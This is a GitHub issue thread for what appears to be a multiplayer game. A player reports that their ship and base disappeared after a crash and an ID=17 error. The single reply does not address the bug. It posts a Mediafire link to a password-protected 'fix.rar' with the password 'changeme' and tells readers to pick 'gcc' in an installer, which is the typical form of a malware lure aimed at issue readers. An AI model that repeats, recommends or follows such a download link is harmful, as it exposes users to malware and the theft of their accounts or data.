### ISSUE TITLE
Base and ship vanished

### ISSUE THREAD

**Issue by diminanoga** [Eggs-D-Studios/wos-issues#278]
### Guidelines

- [X] I checked for duplicate bug reports
- [X] I tried to find a way to reproduce the bug

### Version

Main (Production)

### What happened? What did you expect to happen?

We were exploring as a team of 3. We descended down to a planet, then crashed.
Upon rejoining we got a ID=17 Error.
We waited a bit and then i rejoined and spawned on the planet, with my ship nowhere to be found. I tried respawning but it put me in a random location, even though i had a spawn on that ship before it vanished.
We respawned on our main base, a third of it was gone, we rejoined and another third was gone. As i'm writing this, the rest of it vanished right before my eyes, the only thing left is a hyperdrive, seat, 4 wheels, a piece of iron and some guns. Everything else is gone with some parts found across the map.

### How can we reproduce this bug?

 1. Play the game

### Frequency

I can't make it happen consistently

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
